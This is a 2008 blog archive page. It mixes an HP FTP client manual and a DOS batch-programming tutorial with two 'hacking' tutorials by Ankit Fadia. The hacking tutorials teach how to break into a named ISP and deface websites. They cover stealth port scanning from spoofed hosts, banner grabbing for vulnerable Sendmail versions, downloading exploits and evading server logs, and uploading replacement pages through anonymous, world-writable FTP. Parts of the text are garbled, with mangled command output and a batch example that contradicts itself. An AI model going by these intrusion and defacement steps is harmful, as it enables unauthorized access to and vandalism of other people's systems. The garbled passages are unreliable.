Full version Downloads: November 2008

Home » Archives for November 2008

Sunday, November 23, 2008

Proxy Test

Check if your proxy is truly anonymous. This test tries to detect your real IP address even if connected via a proxy server.

Continue reading →

Anonymous Surfing

Select an anonymous proxy server from the drop-down list, enter a URL anb click "Go" to view a site anonymously.

Continue reading →

Running the FTP User (Client) Program

To run the FTP client program from the CI prompt:

:RUN FTP.ARPA.SYS [; INFO= "remotehostname"]

:FTP.ARPA.SYS [remotehostname]

or on 5.0 and greater, if the HPPATH CI variable has ARPA.SYS in it, you can also run the client program by:

:FTP [remotehostname]

From the POSIX shell you can run the client program by:

shell iX> ftp

You can start the FTP user program and connect to a remote host in one step by using the INFO=string in the form:

:RUN FTP.ARPA.SYS;INFO="remotehostname"

Where remotehostname is the ARPA domain name, internet protocol (IP) address, or remote host NS name.

Once the connection has been established, enter the remote user logon name and password when prompted as described in the next section under "Logging On."

Continue reading →

Connecting and Logging On to a Remote Host

From FTP, you must establish a connection to the remote host you wish to access.

If you did not enter a remote host name on the command line when you started FTP, you must open a connection to the remote system as follows.

From the ftp> prompt, enter the OPEN command followed by the remote host ARPA domain name, internet protocol (IP) address, or NS node name supplied by your network administrator:

ftp> OPEN remotehostname

IP Addresses

IP addresses are assigned by your network administrator to uniquely identify computer systems to allow communication between systems on the network.

IP addresses, also called internet addresses, are in the form:

nnn.nnn.nnn.nnn

Where nnn is a number from 000 to 255, inclusive. For example, if the IP address of the remote system is 123.1.20.125, you would enter:

ftp> OPEN 123.1.20.125

Node Names

Besides using IP addresses with the FTP OPEN command, you can use either an ARPA domain name or an NS node name in the OPEN command. NS names are recognized if the remote host supports the Probe protocol or if the remote host name is configured in your local node network directory. ARPA domain names are configured in two ASCII files, RSLVCNF.NET.SYS and HOSTS.NET.SYS. For configuration information, refer to Installing and Managing HP ARPA File Transfer Protocol Network Manager's Guide. Obtain the node names from your network administrator. For example, if the name,node2, is configured as a remote host name on your network, you can enter:

ftp> OPEN node2

For a system identified by a fully-qualified NS nodename such as nodex3.test.hp (in the form:nodename.domain.organization, you can enter:

ftp> OPEN nodex3.test.hp

Logging On

Once the connection has been established, enter the remote user logon name and password when prompted.

You must know the user logon syntax for the remote host you are accessing. For example, an HP 9000 logon name could be: myname. You would enter the following when prompted:

Name (username) myname
331 Password required for myname.
PASSWORD:          (enter password)
230 User myname logged in.

Passwords are not echoed back to your terminal screen.

Changing Accounts

To log into a different user account on the remote system, use the USER command. After entering the user logon name, you are prompted for any passwords associated with the logon name:

ftp> USER myname
331 Password required for myname.
PASSWORD:          (enter password)
230 User myname logged in.

Accessing Another Remote Host

After establishing a connection to a remote host, you can access another remote host by entering theCLOSE command, then entering another OPEN remotehostname command:

ftp> CLOSE

ftp> OPEN remotehostname

Continue reading →

Friday, November 14, 2008

Gathering Info on Remote Host: Essential Ingredient of Hacking into it

______________________________________________________________________

I get a lot of emails from people asking me how they can break into their ISP or how they can break into a system etc etc. Infact, such questions are almost the most common ones, from all the questions I get. Well, after this popular demand, I thought that an entire manual on breaking into systems was needed. So here goes..

You see, breaking into systems or getting root on a system is not as difficult as it seems. And it by no means requires you to be an Uberhacker. Getting into a system is quite easy and it requires you to know at least one programming language (preferably C), and have a more than an average IQ. However, breaking into systems does require a bit of luck and also a bit of carelessness or stupidity on the part of the system administrator of the target system.

What I mean to say by all this is that, breaking into systems is no big deal, anyone could do that, even a script kiddie, however, the part of the entire Hacking process where more than most people falter is the remaining undetected part. Anonymity or remaining anonymous to the Server logs and preventing detection of a break-in is the most difficult part of Hacking into a system.

What separates a good Hacker from a Script Kiddie or a Lamer is that the former has more than several ways of making sure that no one even suspects that there has been a break in, while on the other hand, the later has no clue what so ever as to what he is doing or what he needs to do to prevent such detection. There are so many ready to Use canned C programs or Hacking utilities available on the net, that a huge number of wannabe hackers, download them and use them to Hack into systems. Well, not only do they do not work properly and flawlessly, they also provide no mechanism of remaining anonymous. What is more, say if you are not using a canned Hacking tool, and are also not trying to remain anonymous, then you stand a greater chance of remaining undetected than if you were using such a tool. So think before you use such tools, you might be able to get the Password file and become very kewl, however, you will certainly be caught later if not sooner.

The first step that you need to take once you have decided the target computer is to find out as much information as you can about it. You see, to break into a system you need to exploit a vulnerability existing in the services offered by it. Almost all systems have certain open ports, which have certain daemons or services running on them.

**********************

HACKING TRUTH: There are two types of ports. There are hardware ports, which are the slots existing behind the CPU cabinet of your system, into which you plug-in or connect your hardware to. For Example, COM1, COM2, Parallel Port etc. However, we are not interested in such ports. We are concerned with the other type of ports, which are the virtual or the software ports. Such a virtual port is basically a virtual pipe through which information goes in and out. And all open ports have a service or daemon running on it. A service or a daemon is nothing but the software running on these ports, which provide a certain service to the users who connect to it. For Example, Port 25 is always open on a server handling mails, as it is port where the Sendmail service is running by default.

**********************

So basically the first step in your quest to breaking into a system is to get as much information on it, as you can. Try to get, the list of open ports, the list of services running on the respective open ports and whole lots of other kind of information to which I will come later.

Anyway, so firstly, get a good Port Scanner, preferably stealth and then do a port scan on the target host. Now one thing that you must remember while doing a port scan is the fact that there are various so called 'stealth' port scanners around which claim to be undetectable, however most of them are detectable. So instead of using such' false claims' port scanners, I suggest you code one on your own.

But why do I need to use a stealth Port Scanner and how can I code my own Port Scanner? Well, the reason as to why you need a stealth port Scanner is that many system administrators log all port scans and records the IP and other information on such attempts, this makes you susceptible to getting caught. In my opinion the best Port Scanners around are those, which send SYN/FIN packets from a spoofed host, making logging useless. Such a port Scanner would be coded in C, but will not run in Windows. This was just an idea, now it is up to you to code it yourself.

Anyway, let me assume that you have got hold of a good 'impossible to detect' Port Scanner, now scan the target system for all open ports and record the open lists:

Note: In this manual, I have taken up my ISP as an example target system. It would be foo-barred throughout as xxx.bol.net.in

In my case, I found that the following ports were open:

Port Number Service

21 FTP

23 Telnet

25 SMTP

53 DNS
79 Finger

80 HTTP

110 POP

111 Not Useful
System running and also the FTP daemon running. Well, actually it is the login prompt of the daemon banner which gives us the Operating System running on it. Normally, a typical daemon banner, would have the following Login prompt:

220 xxx2.bol.net.in FTP server (Digital UNIX Version 5.60) ready.

User (bol.net.in:(none)):

Notice the System name in the brackets on the first line. However, normally almost all FTP daemons are better configured (that is the case in the example target system: xxx.bol.net.in)and their login prompt is somewhat like the below:

220 ftp2.xxx.bol.net.in FTP server ready.

User (mail2.bol.net.in:(none)):

See, no Operating System name. However, with the help of some kewl commands, such systems too can be reveal the OS running on them. However, before we go on, there is one thing that you have to be clear about. Now, we had FTP'ed to xxx.bol.net.in, so you normally expect to connect to Port 21 of xxx.bol.net.in, however that is not true. (Atleast in this case.) If you look at the daemon banner again, then you would notice that the last line says:

220 ftp2.xxx.bol.net.in FTP server ready.

Now how did that happen? Well, is Port 21 not open on xxx.bol.net.in ? Well, no and yes. What actually happens is that, Port 21 of xxx.bol.net.in is open and a daemon there is listening for connections. As soon as a connection is established, it transfers the control or connected the visitor to ftp2.xxx.bol.net.in, which is on the same network as xxx.bol.net.in. Now this, ftp.xxx.bol.net.in system is solely a FTP machine. It has no other services running. So whatever information, we gather from such a FTP port is not of xxx.bol.net.in but of ftp2.bol.net.in. Get it?

Anyway, when you get the login prompt, then login anonymously with the anonymous as the Username and a false email address as the password.

220 ftp2.xxx.bol.net.in FTP server ready.

User (ftp2.xxx.bol.net.in:(none)): anonymous

331 Guest login ok, send your complete e-mail address as password.

Password: xxx@linux.net

230 User anonymous logged in. Access restrictions apply.

Even if you have an account at the FTP server into which you plan to break in, it is always better not to use that pair of Username and Password. Logging in anonymously has many advantages. Say if you did cause some harm to the target system and if you use your (Nonanonymous) Username and Password pair, then if you were not able to edit the server logs you could get into some serious trouble. [Well actually not much, only say your account might be disabled. However, it could be worse.]

Ok, you are in, now let us get the FTP client to tell us which commands are available by typing the help command.

ftp> help

Commands may be abbreviated. Commands are:

! delete literal prompt

? debug ls put

append dir mdelete pwd

asc O CWD STAT XRMD SIZE

REIN* MODE MSND* REST XCWD HELP PWD MDTM

QUIT RETR MSOM* RNFR LIST NOOP XPWD I mean by that is that all remote FTP commands have to be preceded by the word 'literal'. For example, say you want to execute the remote FTP command: 'stat', then you would type:

ftp> literal stat

***************
HACKING TRUTH: According to FTP help, the literal command is described as:

ftp> help literal

literal send arbitrary ftp command

***************

Anyway, amongst the remote FTP commands, the commands of interest to us are-: 'stat' and 'syst'. Let us see what they return when executed-:

ftp>literal stat

211- ftp2.xxx.bol.net.in FTP server status:

Version 5.60

Connected to 203.xx.251.198 (203.xx.251.198)

Logged in anonymously

TYPE: ASCII, FORM: Nonprint; STRUcture: File; transfer MODE: Stream

211- No data connection

211 End of status

Note: The IP address is of xxx.bol.net.in and not your machine.

ftp> literal syst

215 UNIX Type: L8 Version: BSD-198911

Voila, we get the Operating System name running on ftp2.xxx.bol.net.in. At last some useful information.

Finger and HTTP both failed, what do we do now? Let us turn to the den of the Buggiest daemon on Earth i.e. Sendmail: Port 25, the SMTP port.

Sendmail is certainly the buggiest daemon on earth; it has the highest number of known exploits amongst all the daemons. So this probably should get us through. Let us telnet to Port 25 and find out whether an exploitable version of Sendmail is running.

C:\windows> telnet xxx.bol.net.in 25

220 xxx.bol.net.in ESMTP Sendmail 8.9.1 (1.1.20.3/27Jun00-0346PM) Thu, 29 Jun 2000 14:18:12 0530 (IST)

When you telnet to Port 25, then the first thing that you come across would be a something like the above welcome daemon banner. A daemon banner is a Hacker's best friend. It reveals important information about the host, which proves to be invaluable in breaking into it. It basically tells you which daemon or service is running on that port and also the version of that particular service. Like for example, in this case, the Sendmail daemon banner tells us that ESMTP Sendmail 8.9.1 is running and it also gives us other information about the host at which this service is running.

Anyway, getting back to the topic, this banner reveals a big vulnerability existing in the host computer. It tells us that xxx.bol.net.in is running an old, vulnerable version of Sendmail. The latest version is Sendmail 8.9.4 (correct me if I am wrong.), so this particular version of Sendmail wouldn't be without any bugs.

So then what you do is visit PacketStorm or search at your favorite Hacking stuff related search engine for a C program which demonstrates how to exploit version 8.9.4 of Sendmail. Now, all this might sound a bit too simple, well it certainly isn't, read on for more info.

Now, there are a couple of things that you need to keep in mind while getting this done. Say, you have found out that the victim runs Sendmail 8.9.4, now you cannot simply break in by running any exploit for this version. By that what, I mean to say is that, an exploit, which is coded to be executed on a Linux platform, will not work if you try to compile and run it on a Windows platform. So basically before you execute the 'kewl' exploit program that you downloaded, you should find out which platform it is meant for and if you are not running that platform, then you will need to get your gray cells working.

This is the stage where real hackers are differentiated between script kiddies, this is when those people who really know something prevail. Normally say if a exploit is designed to work on Linux, then if you edit its code and change its header files (if necessary), then that particular exploit can be made to run on Windows too. However, there are certain exploits, which simply would not run on a different OS than it is designed too.

Anyway, let us get back to point. You have edited the exploit code and made it compatible with your platform. Now what else? Another thing that you want to keep in mind is the Operating System, which the exploit can exploit. You see, there are certain exploits, which work only if the victim system is running a specific Operating System. For Example,

There was once a Sendmail hole, which worked only if the target System was running Sun OS without which, it simply refused to even work.

So in some cases it becomes necessary, to find out the Operating System running at the target system. Although not all exploits require the target system to be running a specific system, but why take a chance. Right?

So basically you should be aware of the following things while getting a ready to use exploit-:

1.) The Daemon name and version you are trying to exploit For Example, Sendmail 8.9.4

2.) The Operating System at which it is designed to run. (If necessary)

3.) The operating System it requires the target system to be running. (If necessary)

That brings us to as to how to find out the Operating System running at the target system? Well, the HTTP port holds the key. Simply, telnet to Port 80 of the target system.

C:\windows>telnet xxx.bol.net.in 80

Now, once you get the input prompt, then, type an invalid HTTP command. For Example, X or Iamgreat or abc etc. Just type anything as long as it is not a valid HTTP command. Then press enter twice.

***********

Hacking Truth: After each HTTP command one has to press Enter Twice to send the command to the server or to bring about a response from a server. It is just how the HTTP protocol works.

**********

On Port 80 of my example target system, I type simply 'ankit' and press enter twice. This is the kind of response I get:

HTTP/1.1 400 Bad Request

Server: Netscape-Enterprise/3.5.1

The server replies with the version of HTTP it is running (not so important), it gives us an error message and the error code associated with it(again not so important), but it also gives us the OS name and OS version, it is running. Wow!!! It gives hackers who want to break into their server the ultimate piece of information, which they require.

Well, these were the common ways of finding out more information about a host in your quest to break into it. I will soon be updating this manual, hope you enjoyed the first edition. Till the next update, goodbye.

COMING SOON: Finding out more Information about the remote host.

Exploiting the R Services (rlogin etc) or Exploiting Trust Relationships

Exploiting Routers

More Fun with Remote Hosts

Ankit Fadia

Ankit@bol.net.in

http://www.ankitfadia.com

To receive tutorials written by Ankit Fadia on everything you ever dreamt of in your Inbox, join his mailing list by sending a blank email to: programmingforhackers-subscribe@egroups.com

Wanna ask a question? Got a comment to make? Criticize, Comment and more…..by sending me an Instant Message on MSN Messenger. The ID that I use is: ankit_fadia@hotmail.com

Wanna learn Hacking? Wanna attend monthly lectures and discussions on various Networking/Hacking topics? Lectures, Debates and Discussions, get it all by simply joining The Hacking Truths club by clicking Here

Continue reading →

Defacing Websites: A Step By Step Process

__________________________________________________
Defacing Websites Part I : A Step By Step Process By Ankit Fadia ankit@bol.net.in
________________________________________________________________________
Date Released: 29th June 2001
In the past I have received a number of queries like: How do I deface websites? How do I replace someone else’s
web page with my own? Questions like these had become very common. After procrastinating this manual for some
weeks, I finally have got down to bringing it out.
Before we move on with this manual, it is important to note that this manual explores only one method of defacing
websites and the described process will not necessarily work on all target systems. Also note that we take an
imaginary target system X for the below steps.
Identifying a Vulnerable host
A number of system administrators have a tendency to keep even those ports on their system open, which have no
useful daemon running on them. One tip given to all system administrators is to close all those ports or disable all
those daemons/services, which have no great use. However, many system administrators around the world are both
too carefree and ignorant or lack the knowledge required to be able to get a list of running services and disabling the
not useful ones. In effect they keep their system vulnerable to outside attacks by keeping even those ports open,
which could have been done without.
The first step to be able to deface a website successfully is to identify a vulnerable host, against which you can carry
out attacks. The defacing process described in this manual requires for the Port 21 or the FTP port of the target
system to be open and allowing anonymous logins. In effect, you first step would be to port scan the target system X
and find out whether or not the FTP port is open, and if the FTP port is open, then whether it allows for anonymous
logins or not.
When I port scanned X, I find that Port 21 is open and it indeed has the FTP daemon running. I then use the FTP MSDOS
utility to ftp to port 21 of X.
C:\WINDOWS>ftp X
Connected to X
220 X FTP server (Digital UNIX Version 5.60) ready.
User (X:(none)):
FTP’ing to the port 21 of the target system brings up a prompt which asks for a Username. Now, let us try to login
anonymously:
User (X:(none)): anonymous
331 Guest login ok, send ident as password.
The daemon did not get an error message, thus it does allow anonymous logins. Now, I just enter any fake email
address as my password and login:
Password: fake_email@fake_domain.com
Defacing Websites: A Step By Step Process By Ankit Fadia Hacking Truths. FTP Exploits
230 Guest login ok, access restrictions apply.
ftp>
Actually, one does not need to login anonymously for this method to work. Even if you have a normal account with
the target system, using which you can login to the FTP daemon and if the system is vulnerable, then this method
will still work. If your target system does not allow anonymous logins and if you do not even have an account with
them, then another thing that you could try is: Trying to login using the default password of the FTP daemon running
on the target system. (For more information regarding default passwords, read: http://hackingtruths.box.sk/
defaultpasswd.htm) However, the fact remains that the method described in this manual works the best with servers,
which have anonymous logins, enabled.
The Vulnerability Itself
In the above paragraphs, I have mentioned the term: ‘the method’, several times. So what exactly is this method and
what vulnerability does it exploit?
Ideally, the FTP port should be disabled unless it is really of some use. If one does have to necessarily keep the FTP
daemon running, then typically each user’s file access should be limited to a particular directory. For example, like
my ISP gives an FTP account to each subscriber, with each subscriber having file access to the following directory:
/bin/users/username
However, sometimes both anonymous logins and normal logins give the user access to the entire directory structure.
This means that each and every user can login to the Port 21 of the vulnerable system and browse through all
directories and access all files on that particular system. In such cases, the attacker tries to lay his hands on the /etc/
passwd file. But that is not we lay the stress on, in this manual.
On top of all this, many servers have world write-able directories, to which all users have access to, due to the above
problem. The directories being world write-able, means that all users can login and upload any files of their choice
onto the target system. Or in other words, anyone can write to the target system. Thus, you not only have access to all
directories on the target system, but you can save and delete or even replace all files on that system, just as if it were
your local hard disk.
********************
HACKING TRUTH: How do I know whether my target system’s FTP port gives me access to world write-able
directories? If you are able to upload any file to the target system, then it probably means that the directory into
which logged in is at least write-able by you.
*******************
This vulnerability can be used by an attacker to access the directory where the pages of the website hosted by the
target system are stored. Once the attacker knows which directory stores the web pages of the target system then he
can easily edit their pages or even replace their entire site with his own, with the help of a simple command:
ftp> mput filename
Please note that if you FTP to a system and find that you are able to upload files, then it could also mean that your
particular directory is write-able by you, while you do not have privileges to write to other directories. Such a
scenario is quite common in the case of Webspace providers, in which each subscriber is given a particular space to
Defacing Websites: A Step By Step Process By Ankit Fadia Hacking Truths. FTP Exploits
store files or in other words each other member is given a write-able directory to which he can upload files. The gist
being, having write privileges in one directory does not give you write privileges in all directories.
With this we come to the end of the first in the series of guides to Defacing websites. Thanks for reading and till the
next update, take care. J
Ankit Fadia
Ankit@bol.net.in
http://hackingtruths.box.sk
Wanna ask a question? Got a comment to make? Criticize, Comment and more…..by sending me an Instant Message
on MSN Messenger. The ID that I use is: ankit_fadia@hotmail.com
Wanna learn Hacking? Wanna attend monthly lectures and discussions on various Networking/Hacking topics?
Lectures, Debates and Discussions, get it all by simply joining The Hacking Truths club by clicking Here
Take the HTCH examination to give recognition to your Hacking Skills. Click Here

Continue reading →

Batch File Programming

Batch File Programming __________________________________________________________________

Batch file programming is nothing but the Windows version of Unix Shell

Programming. Let's start by understanding what happens when we give a

DOS command. DOS is basically a file called command.com

It is this file (command.com) which handles all DOS commands that you

give at the DOS prompt---such as COPY, DIR, DEL etc. These

commands are built in with the Command.com file. (Such commands which

are built in are called internal commands.).DOS has something called

external commands too such as FORMAT,

UNDELETE, BACKUP etc.

So whenever we give a DOS command either internal or external,

command.com either straightaway executes the command (Internal

Commands) or calls an external separate program which executes the

command for it and returns the result (External Commands.)

So why do I need Batch File Programs? Say you need to execute a set

of commands over and over again to perform a routine task like Backing

up Important Files,Deleting temporary files(*.tmp, .bak , ~.* etc)

then it is very difficult to type the same set of commands over and over

again. To perform a bulk set of same commands over and over again,

Batch files are used. Batch Files are to DOS what Macros are to

Microsoft Office and are used to perform an automated predefined set

of tasks over and over again.

So how do I create batch files? To start enjoying using Batch files, you

need to learn to create Batch files. Batch files are basically plain text

files containing DOS commands. So the best editor to write your

commands in would be Notepad or the DOS Editor (EDIT) All you need

to remember is that a batch file should have the extension .BAT(dot

bat)Executing a batch file is quite simple too. For example if you create

a Batch file and save it with the filename

batch.bat then all you need to execute the batch file is to type:

C:\windows>batch.bat

So what happens when you give a Batch file to the command.com to

execute?

Whenever command.com comes across a batch file program, it goes into

batch mode. In the batch mode, it reads the commands from the batch

file line by line. So basically what happens is, command.com opens the

batch file and reads the first line, then it closes the batch file. It then

executes the command and again reopens the batch file and reads the

next line from it. Batch files are treated as Internal DOS commands.

*********************

Hacking Truth: While creating a batch file, one thing that you need to

keep in mind is that the filename of the batch file should not use the

same name as a DOS command. For example, if you create a batch file

by the name dir.bat and then try to execute it at the prompt, nothing

will happen.This is because when command.com comes across a command,

it first checks to see if it is an internal command. If it is not then

command.com checks if it a .COM, .EXE or .BAT file with a matching

filename.All external DOS commands use either a .COM or a .EXE

extension, DOS never bothers to check if the batch program exits.

*********************

Now let's move on to your first Batch file program. We will unlike

always(Normally we begin with the obligatory Hello World program) first

take up a simple batch file which executes or launches a .EXE program.

Simply type the following in a blank text file and save it with a .BAT

extension.

C:

cd windows

telnet

Now let's analyze the code, the first line tells command.com to go to

the C:Next it tells it to change the current directory to Windows. The

last line tells it to launch the telnet client. You may contradict saying

that the full filename is telnet.exe. Yes you are right, but the .exe

extension is automatically added by command.com. Normally we do not

need to change the drive and the directory as the Windows directory is

the default DOS folder. So instead the bath file could simply contain

the below and would still work.

telnet

Now let's execute this batch file and see what results it shows. Launch

command.com (DOS) and execute the batch file by typing:

C:\WINDOWS>batch_file_name

You would get the following result:

C:\WINDOWS>scandisk

And Scandisk is launched. So now the you know the basic functioning of

Batch files, let' move on to Batch file commands.

The REM Command

The most simple basic Batch file command is the REM or the Remark

command. It is used extensively by programmers to insert comments into

their code to make it more readable and understandable. This command

ignores anything there is on that line. Anything on the line after REM is

not even displayed on the screen during execution. It is normally not

used in small easy to understand batch programs but is very useful in

huge snippets of code with geek stuff loaded into it. So if we

add Remarks to out first batch file, it will become:

REM This batch file is my first batch program which launches the fav

hacking

tool; Telnet

telnet

The only thing to keep in mind while using Remarks is to not go

overboard and putting in too many of them into a single program as they

tend to slow down the execution time of the batch commands.

ECHO: The Batch Printing Tool

The ECHO command is used for what the Print command is in other

programming languages: To Display something on the screen. It can be

used to tell the user what the bath file is currently doing. It is true

that Batch programs display all commands it is executing but sometimes

they are not enough and it is better to also insert ECHO commands

which give a better description of what is presently being done. Say for

example the following batch program which is full of the ECHO

command deletes all files in the c:\windows\temp directory:

ECHO This Batch File deletes all unwanted Temporary files from your

system ECHO Now we go to the Windows\temp directory.

cd windows\temp

ECHO Deleting unwanted temporary files....

del *.tmp

ECHO Your System is Now Clean

Now let's see what happens when we execute the above snippet of batch

code.

C:\WINDOWS>batch_file_name

C:\WINDOWS>ECHO This Batch File deletes all unwanted Temporary

files from your

system

C:\WINDOWS>ECHO Now we go to the Windows\temp directory.

Now we go to the Windows\temp directory.

C:\WINDOWS>cd windows\temp

Invalid directory

C:\WINDOWS>ECHO Deleting unwanted temporary files

Deleting unwanted temporary files...

C:\WINDOWS>del *.tmp

C:\WINDOWS>ECHO Your System is Now Clean

Your System is Now Clean

The above is a big mess! The problem is that DOS is displaying the

executed command and also the statement within the ECHO command.

To prevent DOS from displaying the command being executed, simply

precede the batch file with the

following command at the beginning of the file:

ECHO OFF

Once we add the above line to our Temporary files deleting Batch

program , the output becomes:

C:\WINDOWS>ECHO OFF

This Batch File deletes all unwanted Temporary files from your system

Now we go to the Windows\temp directory.

Invalid directory

Deleting unwanted temporary files...

File not found

Your System is Now Clean

Hey pretty good! But it still shows the initial ECHO OFF command. You

can prevent a particular command from being shown but still be

executed by preceding the command with a @ sign. So to hide even the

ECHO OFF command, simple replace the

first line of the batch file with @ECHO OFF

You might think that to display a blank line in the output screen you can

simply type ECHO by itself, but that doesn't work. The ECHO command

return whether the ECHO is ON or OFF. Say you have started your

batch file with the command ECHO OFF and then in the later line give

the command ECHO, then it will display ' ECHO is off ' on the screen.

You can display a blank line by giving the command ECHO.(ECHO followed

by a dot)Simply leaving a blank line in the code too displays a blank line

in the output.

You can turn ON the ECHO anytime by simply giving the command ECHO

ON. After turning the echo on , if you give the command ECHO then it

will return ' ECHO is on '

The PAUSE Command: Freezing Time

Say you create a batch file which shows the Directory Listing of a

particular folder(DIR) before performing some other task. Or

sometimes before deleting all files of a folder, you need to give the

user time to react and change his mind. PAUSE, the name says it all, it

is used to time out actions of a script.

Consider the following scenario:

REM This Batch program deletes *.doc files in the current folder.

REM But it gives the user to react and abort this process.

@ECHO OFF

ECHO WARNING: Going to delete all Microsoft Word Document

ECHO Press CTRL+C to abort or simply press a key to continue.

PAUSE

DEL *.doc

Now when you execute this batch program, we get the following output:

C:\WINDOWS>a.bat

WARNING: Going to delete all Microsoft Word Document

Press CTRL+C to abort or simply press a key to continue.

Press any key to continue . . .

The batch file program actually asks the user if he wishes to continue

and gives the user the option to abort the process. Pressing CTRL+C

cancels the batch file program(CTRL+C and CTRL+Break bring about the

same results)

^C

Terminate batch job (Y/N)?y

After this you will get the DOS prompt back.

****************

HACKING TRUTH: Say you have saved a batch file in the c:\name

directory. Now when

you launch command.com the default directory is c:\windows and in

order to

execute the batch file program stored in the c:\name directory you

need to

change the directory and go to c:\name.This can be very irritating and

time

consuming. It is a good practice to store all your batch programs in the

same

folder. You can run a batch file stored in any folder(Say c:\name) from

anywhere(even c:\windows\history) if you include the folder in which the

batch

file is stored (c:\name)in the AUTOEXEC.BAT file, so that DOS knows

which folder

to look for the batch program.

So simply open c:\autoexec.bat in Notepad and append the Path

statement to the

following line[c:\name is the folder in which all your batch files are

stored.]:

SET PATH=C:\WINDOWS;C:\WINDOWS\COMMAND;C:\name

Autoexec.bat runs each time at startup and DOS knows each time, in

which

directory to look for the batch files.

********************

Parameters: Giving Information to Batch Programs

To make batch programs really intelligent you need to be able to provide

them

with parameters which are nothing but additional valuable information

which is

needed to ensure that the bath program can work efficiently and

flexibly.

To understand how parameters work, look at the following script:

@ECHO OFF

ECHO First Parameter is %1

ECHO Second Parameter is %2

ECHO Third Parameter is %3

The script seems to be echoing(printing) messages on the screen, but

what do the

strange symbols %1 , % 2 etc stand for? To find out what the strange

symbols

stand for save the above script and go to DOS and execute this script

by passing

the below parameters:

C:\windows>batch_file_name abc def ghi

This batch file produces the following result:

C:\windows>batch_file_name abc def ghi

First Parameter is abc

Second Parameter is def

Third Parameter is ghi

The first line in the output is produced by the code line:

ECHO First Parameter is %1

Basically what happens is that when DOS encounters the %1 symbol, it

examines

the original command used to execute the bath program and look for the

first

word (argument) after the batch filename and then assigns %1 the value

of that

word. So one can say that in the ECHO statement %1 is replaced with

the value of

the first argument. In the above example the first word after the

batch file name

is abc, therefore %1 is assigned the value of this word.

The %2 symbol too works in the similar way, the only difference being

that

instead of the first argument, DOS assigns it the value of the second

argument,

def. Now all these symbols, %1, %2 are called replaceable parameters.

Actually

what happens is that %1 is not assigned the value of the first argument,

but

in fact it is replaced by the value of the first argument.

If the batch file command has more parameters than what the batch

file is

looking for, then the extras are ignored. For example, if while executing

a batch

file program , we pass four arguments, but the batch file program

requires only

3 parameters, then the fourth parameter is ignored.

To understand the practical usage of parameters, let's take up a real

life

example. Now the following script requires the user to enter the name

of the

files to be deleted and the folder in which they are located.

@ECHO OFF

CD\

CD %1

DEL %2

This script can be called from the DOS prompt in the following way:

C:\windows>batch_file_name windows\temp *.tmp

In a single script we cannot use more that nine replaceable parameters.

This

means that a particular batch file will have replaceable parameters from

%1 to

%9.Infact there is a tenth replaceable parameter, the %0 parameter.

The %0

parameter contains the name of the batch file itself.

************

HACKING TRUTH: Say you want to execute a batch file and once the

procedure of

execution is complete, want to leave DOS and return to Windows, what

do you do?

The EXIT command can be used in such situations. So simply end your

batch file

with the EXIT command.

EXIT

************

SHIFT: Infinite Parameters

Sometimes your batch file program may need to use more than nine

parameters at a

time.(Actually you would never need to, but at least you are sure you

can handle

it if you need to.)To see how the SHIFT command works, look at the

following

snippet of code:

@ECHO OFF

ECHO The first Parameter is %1

ECHO.

SHIFT

ECHO The Second Parameter is %1

ECHO.

SHIFT

ECHO The Second Parameter is %1

Now execute this batch file from DOS and see what happens.

C:\windows>batch_file_name abc def ghi

The first Parameter is abc

The Second Parameter is def

The Second Parameter is ghi

How does it work? Well, each SHIFT command shuffles the parameters

down one

position. This means that after the first SHIFT %1 becomes def, %2

becomes ghi

and abc is completely removed by DOS. All parameters change and move

one position

down.

Both normal parameters (%1 , % 2 etc) and the SHIFT command can be

made more

efficient by grouping them with the IF conditional statement to check

the

parameters passed by the User.

THE FOR LOOP

The syntax of the FOR LOOP is:

FOR %%PARAMETER IN(set) DO command

Most people change their mind about learning Batch Programming when

they come

across the syntax of the For Command. I do agree that it does seem a

bit weird,

but it is not as difficult as it appears to be. Let's analyze the various

parts

of the For command. Before we do that look at the following example,

@ECHO OFF

CLS

FOR %%A IN (abc, def, xyz) DO ECHO %%A

Basically a FOR LOOP declares a variable (%%A) and assigns it different

values

as it goes through the predefined set of values(abc, def, xyz) and each

time

the variable is assigned a new value, the FOR loop performs a

command.(ECHO %%A)

The %%A is the variable which is assigned different values as the loop

goes

through the predefined set of values in the brackets. You can use any

single

letter character after the two % sign except 0 through 9.We use two

%'s as DOS

deletes each occurrence of a single % sign in a batch file program.

The IN(abc, def, xyz) is the list through which the FOR loop goes. The

variable

%%a is assigned the various values within the brackets, as the loop

moves. The

items in the set(The technical term for the set of values within the

brackets)

can be separated with commas, colons or simply spaces.

For each item in the set(The IN Thing) the FOR loop performs whatever

command is

given after the DO keyword.(In this example the loop will ECHO %%A)

So basically when we execute the above batch file, the output will be:

abc

def

xyz

The FOR loop becomes very powerful if used along with replaceable

parameters. Take

the following batch file, for example,

@ECHO OFF

ECHO.

ECHO I am going to delete the following files:

ECHO %1 %2

ECHO.

ECHO Press Ctrl+C to Abort process

PAUSE

FOR %%a IN (%1 %2 ) DO DEL %%a

ECHO Killed Files. Mission Accomplished.

At execution time, the process would be something like:

C:\WINDOWS>batchfilename *.tmp *.bak

I am going to delete the following files:

*.tmp *.bak

Press Ctrl+C to Abort process

Press any key to continue . . .

Killed Files. Mission Accomplished.

----------------------------------

IF: CONDITIONAL BRANCHING

The If statement is a very useful command which allows us to make the

batch files more intelligent and useful. Using this command one can make

the batch programs check the parameters and accordingly perform a

task. Not only can the IF command check parameters, it can also checks

if a particular file exists or not. On top of all this, it can also be used

for the conventional checking of variables (strings).

Checking If a File Exists Or Not

The general syntax of the IF command which checks for the existence

of a file is the following:

IF [NOT] EXIST FILENAME Command

This will become clearer when we take up the following example,

IF EXIST c:\autoexec.bat ECHO It exists

This command checks to see if the file, c:\autoexec.bat exists or not.

If it does then it echoes or prints the string 'It exists'. On the other

hand if the specified file does not exist, then it does not do anything.

In the above example, if the file autoexec.bat did not exist, then

nothing was executed. We can also put in the else clause i.e. If the File

exists, do this but if it does not exists, by using the GOTO command.

Let's consider the following example to make it more clear:

@echo off

IF EXIST C:\ankit.doc GOTO ANKIT

Goto end

:ANKIT

ECHO ANKIT

:end

The IF statement in this code snippet checks to see if there exists a

file, c:\ankit.doc. If it does then DOS is branched to :ANKIT and if it

does not, then DOS goes on to the next line. The next line branches

DOS to :end. The :end and :ANKIT in the above example are called

labels. After the branching the respective echo statements take over.

******************

HACKING TRUTH: We can also check for more than one file at a time,

in the following way:

IF EXIST c:\autoexec.bat IF EXIST c:\autoexec.bak ECHO Both Exist

******************

We can check to see if a file does not exist in the same way, the basic

syntax now becomes:

IF NOT EXIST FILENAME Command

For Example,

IF NOT EXIST c:\ankit.doc ECHO It doesn't Exist

****************

HACKING TRUTH: How do you check for the existence of directories?

